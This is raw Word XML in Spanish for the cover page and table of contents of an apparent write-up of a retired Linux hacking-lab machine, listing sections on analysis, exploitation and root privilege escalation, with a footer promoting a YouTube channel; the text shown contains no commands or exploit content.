U4mOpFQwpTSXnsRvQ6bgKE3rKPsPsdKJz&#10;7rmZ9ZXKneVrIQru9OhpYdATvg7YnfZnp+C0OeZt3wr5fhzN5jtv0OoGlbq/W16egSVc0h8Mv/qk&#10;DjU5teHsTWRWQZblBaEK1lI8ASNCbmUGrKUoLyTwuuL/f6h/AAAA//8DAFBLAQItABQABgAIAAAA&#10;IQC2gziS/gAAAOEBAAATAAAAAAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0A&#10;FAAGAAgAAAAhADj9If/WAAAAlAEAAAsAAAAAAAAAAAAAAAAALwEAAF9yZWxzLy5yZWxzUEsBAi0A&#10;FAAGAAgAAAAhAC4eZpeQAgAAIAUAAA4AAAAAAAAAAAAAAAAALgIAAGRycy9lMm9Eb2MueG1sUEsB&#10;Ai0AFAAGAAgAAAAhAL+GrEjeAAAACwEAAA8AAAAAAAAAAAAAAAAA6gQAAGRycy9kb3ducmV2Lnht&#10;bFBLBQYAAAAABAAEAPMAAAD1BQAAAAA=&#10;" fillcolor="white [3201]" strokeweight=".5pt">
                <v:shadow on="t" color="black" offset="0,4pt"/>
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="017738E8" w14:textId="6BC75915" w:rsidR="00663D49" w:rsidRDefault="00663D49" w:rsidP="00663D49">
                      <w:pPr>
                        <w:rPr>
                          <w:sz w:val="48"/>
                          <w:szCs w:val="48"/>
                          <w:lang w:val="es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CD0B40" wp14:editId="4CBD5073">
                            <wp:extent cx="466927" cy="322922"/>
                            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
                            <wp:docPr id="1232229529" name="Imagen 1232229529" descr="Una señal de alto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4267720" name="Imagen 654267720" descr="Una señal de alto&#10;&#10;Descripción generada automáticamente con confianza media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V="1">
                                      <a:off x="0" y="0"/>
                                      <a:ext cx="470123" cy="3251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48"/>
                          <w:szCs w:val="48"/>
                          <w:lang w:val="es-ES"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="39D865FA" w14:textId="33EAB9C9" w:rsidR="00663D49" w:rsidRPr="0058283C" w:rsidRDefault="00663D49" w:rsidP="00663D49">
                      <w:pPr>
                        <w:rPr>
                          <w:sz w:val="48"/>
                          <w:szCs w:val="48"/>
                          <w:lang w:val="es-E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A47772">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251739136" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2E4BF600" wp14:editId="046C01FD">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-714375</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1829435</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2160270" cy="2183130"/>
            <wp:effectExtent l="342900" t="285750" r="297180" b="388620"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="70704878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48783" name="Imagen 7070487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2183130"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:effectLst>
                      <a:outerShdw blurRad="304800" dist="50800" dir="6600000" sx="107000" sy="107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4E7" w:rsidRPr="00E53B6E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="70AD47" w:themeColor="accent6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19FCB40A" wp14:editId="08594A31">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>146050</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>266700</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1457325" cy="69405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694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A62EC" w14:textId="397644CC" w:rsidR="0046412D" w:rsidRPr="007A24E7" w:rsidRDefault="0046412D" w:rsidP="0046412D">
                            <w:pPr>
                              <w:jc w:val="center"/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7D5522">
                              <w:rPr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ES"/>
                              </w:rPr>
                              <w:t>OS</w:t>
                            </w:r>
                            <w:r w:rsidR="00440990" w:rsidRPr="007A24E7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br/>
                            </w:r>
                            <w:r w:rsidRPr="007A24E7">
                              <w:rPr>
                                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                <w:sz w:val="36"/>
                                <w:szCs w:val="36"/>
                                <w:lang w:val="es-ES"/>
                              </w:rPr>
                              <w:t>Linux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CB40A" id="_x0000_s1040" type="#_x0000_t202" style="position:absolute;margin-left:11.5pt;margin-top:21pt;width:114.75pt;height:54.6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zZ+OwIAALQEAAAOAAAAZHJzL2Uyb0RvYy54bWysVNuO0zAQfUfiHyy/06ShXdio6Wrpsghp&#10;uYiFD3Adu7HW8RjbbVK+nrGTZsuChIR4iWzPnDNz5pLVVd9qchDOKzAVnc9ySoThUCuzq+i3r7cv&#10;XlPiAzM102BERY/C06v182erzpaigAZ0LRxBEuPLzla0CcGWWeZ5I1rmZ2CFQaME17KAV7fLasc6&#10;ZG91VuT5RdaBq60DLrzH15vBSNeJX0rBwycpvQhEVxRzC+nr0ncbv9l6xcqdY7ZRfEyD/UMWLVMG&#10;g05UNywwsnfqN6pWcQceZJhxaDOQUnGRNKCaef5EzX3DrEhasDjeTmXy/4+Wfzzc28+OhP4N9NjA&#10;JMLbO+APnhjYNMzsxLVz0DWC1Rh4HkuWddaXIzSW2pc+kmy7D1Bjk9k+QCLqpWtjVVAnQXZswHEq&#10;uugD4THkYvnqZbGkhKPt4nKRL5cpBCtPaOt8eCegJfFQUYdNTezscOdDzIaVJ5cYzMCt0jo1Vpsn&#10;D1HEW1MnY2BKD2ckiJ5JVRQySgpHLSJemy9CElVjssVQnzidYqMdOTCcK8a5MKEYs07eESYxiwk4&#10;FvZXoA5DNSffCBNpaidg/veIEyJFBRMmcKsMuD8R1A9T5MH/pH7QHDsa+m2PomODorL4tIX6iG12&#10;MKwRrj0eGnA/KOlwhSrqv++ZE5To9wZH5XK+WMSdSxfscoEXd27ZnluY4UhV0UDJcNyEtKdRlIFr&#10;HCmpUrcfMxmTxtVIQzCucdy983vyevzZrH8CAAD//wMAUEsDBBQABgAIAAAAIQAWCG+f3gAAAAkB&#10;AAAPAAAAZHJzL2Rvd25yZXYueG1sTI8xT8MwEIV3JP6DdUhs1KlDUBviVAWJgaEDBfZLfE2ixnaI&#10;3TTw6zkmOp1O79277xWb2fZiojF03mlYLhIQ5GpvOtdo+Hh/uVuBCBGdwd470vBNATbl9VWBufFn&#10;90bTPjaCQ1zIUUMb45BLGeqWLIaFH8ixdvCjxcjr2Egz4pnDbS9VkjxIi53jDy0O9NxSfdyfLGNM&#10;n1W6jlsfwu6gnl5/cFcdv7S+vZm3jyAizfHfDH/4fAMlM1X+5EwQvQaVcpWo4V7xZF1lKgNRsTFb&#10;piDLQl42KH8BAAD//wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+AAAA4QEAABMAAAAAAAAAAAAAAAAA&#10;AAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAOP0h/9YAAACUAQAACwAAAAAA&#10;AAAAAAAAAAAvAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAXdM2fjsCAAC0BAAADgAAAAAA&#10;AAAAAAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEAFghvn94AAAAJAQAADwAA&#10;AAAAAAAAAAAAAACVBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAAKAFAAAAAA==&#10;" filled="f" stroked="f" strokeweight="1pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="5FCA62EC" w14:textId="397644CC" w:rsidR="0046412D" w:rsidRPr="007A24E7" w:rsidRDefault="0046412D" w:rsidP="0046412D">
                      <w:pPr>
                        <w:jc w:val="center"/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</w:pPr>
                      <w:r w:rsidRPr="007D5522">
                        <w:rPr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ES"/>
                        </w:rPr>
                        <w:t>OS</w:t>
                      </w:r>
                      <w:r w:rsidR="00440990" w:rsidRPr="007A24E7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"/>
                        </w:rPr>
                        <w:br/>
                      </w:r>
                      <w:r w:rsidRPr="007A24E7">
                        <w:rPr>
                          <w:color w:val="FFFFFF" w:themeColor="background1"/>
                          <w:sz w:val="36"/>
                          <w:szCs w:val="36"/>
                          <w:lang w:val="es-ES"/>
                        </w:rPr>
                        <w:t>Linux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A24E7" w:rsidRPr="00E53B6E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="70AD47" w:themeColor="accent6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96884BD" wp14:editId="4CE572D1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>right</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>275590</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1650365" cy="651510"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="8182987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0365" cy="651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C3F798" w14:textId="2C66546B" w:rsidR="00B20ED4" w:rsidRPr="007A24E7" w:rsidRDefault="007A24E7" w:rsidP="00B20ED4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7D5522">
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                                <w:color w:val="BFBFBF" w:themeColor="background1" w:themeShade="BF"/>
                                <w:sz w:val="32"/>
                                <w:szCs w:val="32"/>
                                <w:lang w:val="es-ES"/>
                              </w:rPr>
                              <w:t xml:space="preserve">INFORMACIÓN </w:t>
                            </w:r>
                            <w:r w:rsidRPr="007A24E7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br/>
                            </w:r>
                            <w:r w:rsidRPr="007A24E7">
                              <w:rPr>
                                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                <w:lang w:val="es-ES"/>
                              </w:rPr>
                              <w:t>MÁQUINA RETIRADA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84BD" id="_x0000_s1041" type="#_x0000_t202" style="position:absolute;margin-left:78.75pt;margin-top:21.7pt;width:129.95pt;height:51.3pt;z-index:2517340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YB5PQIAALQEAAAOAAAAZHJzL2Uyb0RvYy54bWysVG1v0zAQ/o7Ef7D8nSYpbYGo6TQ6hpDG&#10;ixj8ANexG2uOz9hek+7Xc3bSrAwkJMSXyPbdPXfPc3dZX/StJgfhvAJT0WKWUyIMh1qZfUW/f7t+&#10;8ZoSH5ipmQYjKnoUnl5snj9bd7YUc2hA18IRBDG+7GxFmxBsmWWeN6JlfgZWGDRKcC0LeHX7rHas&#10;Q/RWZ/M8X2UduNo64MJ7fL0ajHST8KUUPHyW0otAdEWxtpC+Ln138Ztt1qzcO2Ybxccy2D9U0TJl&#10;MOkEdcUCI/dO/QbVKu7AgwwzDm0GUiouEgdkU+RP2Nw2zIrEBcXxdpLJ/z9Y/ulwa784Evq30GMD&#10;Ewlvb4DfeWJg2zCzF5fOQdcIVmPiIkqWddaXY2iU2pc+guy6j1Bjk9l9gATUS9dGVZAnQXRswHES&#10;XfSB8JhytcxfrpaUcLStlsWySF3JWHmKts6H9wJaEg8VddjUhM4ONz7Ealh5conJDFwrrVNjtXny&#10;EEm8M3UyBqb0cEaA6JlYRSIjpXDUIsZr81VIomosdj7oE6dTbLUjB4ZzxTgXJsyTMKN3DJNYxRQ4&#10;CvtroA6DmpNvDBNpaqfA/O8Zp4iUFUyYgltlwP0JoL6bMg/+J/YD59jR0O96JI0NWkZm8WkH9RHb&#10;7GBYI1x7PDTgHijpcIUq6n/cMyco0R8MjsqbYrGIO5cui+WrOV7cuWV3bmGGI1RFAyXDcRvSnkZS&#10;Bi5xpKRK3X6sZCwaVyMNwbjGcffO78nr8Wez+QkAAP//AwBQSwMEFAAGAAgAAAAhAGcTWvncAAAA&#10;BwEAAA8AAABkcnMvZG93bnJldi54bWxMj0FPg0AQhe8m/ofNmHizixSbQlmaauLBQw9WvQ8wBVJ2&#10;FtktRX+940mPL+/Ne9/k29n2aqLRd44N3C8iUMSVqztuDLy/Pd+tQfmAXGPvmAx8kYdtcX2VY1a7&#10;C7/SdAiNkhL2GRpoQxgyrX3VkkW/cAOxeEc3Wgwix0bXI16k3PY6jqKVttixLLQ40FNL1elwtoIx&#10;fZTLNOyc9/tj/Pjyjfvy9GnM7c2824AKNIe/MPziyw0UwlS6M9de9QbkkWAgWSagxI0f0hRUKbFk&#10;FYEucv2fv/gBAAD//wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+AAAA4QEAABMAAAAAAAAAAAAAAAAA&#10;AAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAOP0h/9YAAACUAQAACwAAAAAA&#10;AAAAAAAAAAAvAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEA9iGAeT0CAAC0BAAADgAAAAAA&#10;AAAAAAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEAZxNa+dwAAAAHAQAADwAA&#10;AAAAAAAAAAAAAACXBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAAKAFAAAAAA==&#10;" filled="f" stroked="f" strokeweight="1pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="29C3F798" w14:textId="2C66546B" w:rsidR="00B20ED4" w:rsidRPr="007A24E7" w:rsidRDefault="007A24E7" w:rsidP="00B20ED4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7D5522">
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                          <w:color w:val="BFBFBF" w:themeColor="background1" w:themeShade="BF"/>
                          <w:sz w:val="32"/>
                          <w:szCs w:val="32"/>
                          <w:lang w:val="es-ES"/>
                        </w:rPr>
                        <w:t xml:space="preserve">INFORMACIÓN </w:t>
                      </w:r>
                      <w:r w:rsidRPr="007A24E7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ES"/>
                        </w:rPr>
                        <w:br/>
                      </w:r>
                      <w:r w:rsidRPr="007A24E7">
                        <w:rPr>
                          <w:color w:val="FFFFFF" w:themeColor="background1"/>
                          <w:lang w:val="es-ES"/>
                        </w:rPr>
                        <w:t>MÁQUINA RETIRADA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4552">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6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4550993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2F1A16" w14:textId="47942339" w:rsidR="008B5FA3" w:rsidRDefault="008B5FA3">
          <w:pPr>
            <w:pStyle w:val="TtuloTDC"/>
            <w:rPr>
              <w:lang w:val="es-ES"/>
            </w:rPr>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="5FDF1FF1" w14:textId="0E3FF26E" w:rsidR="008B5FA3" w:rsidRDefault="008B5FA3">
          <w:pPr>
            <w:pStyle w:val="TtuloTDC"/>
            <w:rPr>
              <w:lang w:val="es-ES"/>
            </w:rPr>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="65031912" w14:textId="7F4043BD" w:rsidR="008B5FA3" w:rsidRDefault="008B5FA3">
          <w:pPr>
            <w:pStyle w:val="TtuloTDC"/>
            <w:rPr>
              <w:lang w:val="es-ES"/>
            </w:rPr>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="022FCC97" w14:textId="11A9083F" w:rsidR="008B5FA3" w:rsidRDefault="008B5FA3">
          <w:pPr>
            <w:pStyle w:val="TtuloTDC"/>
            <w:rPr>
              <w:lang w:val="es-ES"/>
            </w:rPr>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="6A8D1E6C" w14:textId="2390BCD5" w:rsidR="008B5FA3" w:rsidRPr="00CF4921" w:rsidRDefault="008B5FA3">
          <w:pPr>
            <w:pStyle w:val="TtuloTDC"/>
            <w:rPr>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:val="es-ES"/>
            </w:rPr>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="13D69097" w14:textId="6052E138" w:rsidR="008B5FA3" w:rsidRPr="00206A93" w:rsidRDefault="008B5FA3">
          <w:pPr>
            <w:pStyle w:val="TtuloTDC"/>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:sz w:val="50"/>
              <w:szCs w:val="50"/>
              <w:lang w:val="es-ES"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00206A93">
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:sz w:val="50"/>
              <w:szCs w:val="50"/>
              <w:lang w:val="es-ES"/>
            </w:rPr>
            <w:t>Contenido</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="08247E06" w14:textId="77777777" w:rsidR="008B5FA3" w:rsidRPr="008B5FA3" w:rsidRDefault="008B5FA3" w:rsidP="008B5FA3">
          <w:pPr>
            <w:rPr>
              <w:sz w:val="2"/>
              <w:szCs w:val="2"/>
              <w:lang w:val="es-ES" w:eastAsia="es-PE"/>
            </w:rPr>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="6D1C9F4D" w14:textId="2400205E" w:rsidR="008B5FA3" w:rsidRPr="008B5FA3" w:rsidRDefault="008B5FA3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803585" w:history="1">
            <w:r w:rsidRPr="008B5FA3">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>1.</w:t>
            </w:r>
            <w:r w:rsidRPr="008B5FA3">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B5FA3">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>Análisis</w:t>
            </w:r>
            <w:r w:rsidRPr="008B5FA3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B5FA3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="008B5FA3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc138803585 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="008B5FA3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="008B5FA3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F4187">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidRPr="008B5FA3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E183485" w14:textId="658EE278" w:rsidR="008B5FA3" w:rsidRPr="008B5FA3" w:rsidRDefault="00000000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138803586" w:history="1">
            <w:r w:rsidR="008B5FA3" w:rsidRPr="008B5FA3">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>2.</w:t>
            </w:r>
            <w:r w:rsidR="008B5FA3" w:rsidRPr="008B5FA3">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="008B5FA3" w:rsidRPr="008B5FA3">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>Explotación</w:t>
            </w:r>
            <w:r w:rsidR="008B5FA3" w:rsidRPr="008B5FA3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="008B5FA3" w:rsidRPr="008B5FA3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="008B5FA3" w:rsidRPr="008B5FA3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc138803586 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="008B5FA3" w:rsidRPr="008B5FA3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="008B5FA3" w:rsidRPr="008B5FA3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F4187">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="008B5FA3" w:rsidRPr="008B5FA3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1A3D3B9" w14:textId="65DD8E9C" w:rsidR="008B5FA3" w:rsidRPr="008B5FA3" w:rsidRDefault="00000000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138803587" w:history="1">
            <w:r w:rsidR="008B5FA3" w:rsidRPr="008B5FA3">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>3.</w:t>
            </w:r>
            <w:r w:rsidR="008B5FA3" w:rsidRPr="008B5FA3">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="008B5FA3" w:rsidRPr="008B5FA3">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>Escalada de privilegios para ser root</w:t>
            </w:r>
            <w:r w:rsidR="008B5FA3" w:rsidRPr="008B5FA3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="008B5FA3" w:rsidRPr="008B5FA3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="008B5FA3" w:rsidRPr="008B5FA3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc138803587 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="008B5FA3" w:rsidRPr="008B5FA3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="008B5FA3" w:rsidRPr="008B5FA3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F4187">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
            <w:r w:rsidR="008B5FA3" w:rsidRPr="008B5FA3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975A109" w14:textId="4F48FC48" w:rsidR="008B5FA3" w:rsidRDefault="008B5FA3">
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:lang w:val="es-ES"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="34F567C1" w14:textId="6A556F46" w:rsidR="0051639D" w:rsidRDefault="00CF4921" w:rsidP="00AB7425">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251657214" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="30DEDC94" wp14:editId="6A9AB5F5">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>2611755</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-243840</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3628390" cy="3756119"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="14682324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3245" name="Imagen 146823245"/>
                    <pic:cNvPicPr/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10000" b="90000" l="10000" r="90000">
                                  <a14:foregroundMark x1="20775" y1="67728" x2="20775" y2="67728"/>
                                  <a14:foregroundMark x1="21473" y1="66071" x2="23798" y2="62713"/>
                                  <a14:foregroundMark x1="53488" y1="22503" x2="53488" y2="22503"/>
                                  <a14:foregroundMark x1="53488" y1="20061" x2="56202" y2="3135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82" b="26093"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3628390" cy="375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39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FD22A5" wp14:editId="0926DE46">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:align>right</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>9074150</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="7543800" cy="704850"/>
                <wp:effectExtent l="0" t="0" r="19050" b="19050"/>
                <wp:wrapNone/>
                <wp:docPr id="1876928781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7048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0FB606" w14:textId="586BD937" w:rsidR="0051639D" w:rsidRPr="00A56118" w:rsidRDefault="007A24E7" w:rsidP="007A24E7">
                            <w:pPr>
                              <w:jc w:val="center"/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C76FF6" wp14:editId="501F361D">
                                  <wp:extent cx="270934" cy="187375"/>
                                  <wp:effectExtent l="0" t="0" r="0" b="3175"/>
                                  <wp:docPr id="1749275129" name="Imagen 1749275129" descr="Una señal de alto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4267720" name="Imagen 654267720" descr="Una señal de alto&#10;&#10;Descripción generada automáticamente con confianza media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V="1">
                                            <a:off x="0" y="0"/>
                                            <a:ext cx="283210" cy="1958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  <w:t xml:space="preserve">  </w:t>
                            </w:r>
                            <w:r w:rsidRPr="00A56118">
                              <w:rPr>
                                <w:rFonts w:ascii="Selawik Semibold" w:hAnsi="Selawik Semibold"/>
                                <w:sz w:val="36"/>
                                <w:szCs w:val="36"/>
                                <w:lang w:val="es-ES"/>
                              </w:rPr>
                              <w:t>Para más contenido visita mi canal de YouTube: HackeMate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D22A5" id="_x0000_s1042" style="position:absolute;margin-left:542.8pt;margin-top:714.5pt;width:594pt;height:55.5pt;z-index:25167769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noIfQIAAFkFAAAOAAAAZHJzL2Uyb0RvYy54bWysVEtv2zAMvg/YfxB0X21nSdsFdYqgRYcB&#10;RRusHXpWZKkWIIuapMTOfv0o+ZGgK3YYdrFJkfz45tV112iyF84rMCUtznJKhOFQKfNa0h/Pd58u&#10;KfGBmYppMKKkB+Hp9erjh6vWLsUMatCVcARBjF+2tqR1CHaZZZ7XomH+DKwwKJTgGhaQda9Z5ViL&#10;6I3OZnl+nrXgKuuAC+/x9bYX0lXCl1Lw8CilF4HokmJsIX1d+m7jN1tdseWrY7ZWfAiD/UMUDVMG&#10;nU5QtywwsnPqD6hGcQceZDjj0GQgpeIi5YDZFPmbbJ5qZkXKBYvj7VQm//9g+cP+yW4clqG1fumR&#10;jFl00jXxj/GRLhXrMBVLdIFwfLxYzD9f5lhTjrKLfH65SNXMjtbW+fBVQEMiUVKHzUg1Yvt7H9Aj&#10;qo4q0ZkHrao7pXVi4gCIG+3InmHrQlfEVqHFiVZ2DDlR4aBFtNXmu5BEVRjkLDlM03QEY5wLE4pe&#10;VLNK9D6KRY7pDF5G98lnAozIEqObsAeAUbMHGbF7mEE/moo0jJNx/rfAeuPJInkGEybjRhlw7wFo&#10;zGrw3Otj+CeliWToth3WBnf1PKrGpy1Uh40jDvrt8JbfKezYPfNhwxyuAzYZVzw84kdqaEsKA0VJ&#10;De7Xe+9RH6cUpZS0uF4l9T93zAlK9DeD8/ulmM/jPiZmvriYIeNOJdtTidk1N4BjUOAxsTyRUT/o&#10;kZQOmhe8BOvoFUXMcPRdUh7cyNyEfu3xlnCxXic13EHLwr15sjyCx0LHiXzuXpizw9gGHPgHGFeR&#10;Ld9Mb68bLQ2sdwGkSqN9rOvQAtzfNEvDrYkH4pRPWseLuPoNAAD//wMAUEsDBBQABgAIAAAAIQBD&#10;1tSJ3wAAAAsBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI/BTsMwEETvSPyDtUjcqJ0ooBDiVASpqrik&#10;olTi6sZLEhHbke2m4e/Znuhtdmc1+6ZcL2ZkM/owOCshWQlgaFunB9tJOHxuHnJgISqr1egsSvjF&#10;AOvq9qZUhXZn+4HzPnaMQmwolIQ+xqngPLQ9GhVWbkJL3rfzRkUafce1V2cKNyNPhXjiRg2WPvRq&#10;wrce25/9yUiom6T22dxgum0Om/i13bXv9U7K+7vl9QVYxCX+H8MFn9ChIqajO1kd2CiBikTaZukz&#10;qYuf5DmpI6nHTAjgVcmvO1R/AAAA//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEBAAATAAAA&#10;AAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9If/WAAAA&#10;lAEAAAsAAAAAAAAAAAAAAAAALwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAAfiegh9AgAA&#10;WQUAAA4AAAAAAAAAAAAAAAAALgIAAGRycy9lMm9Eb2MueG1sUEsBAi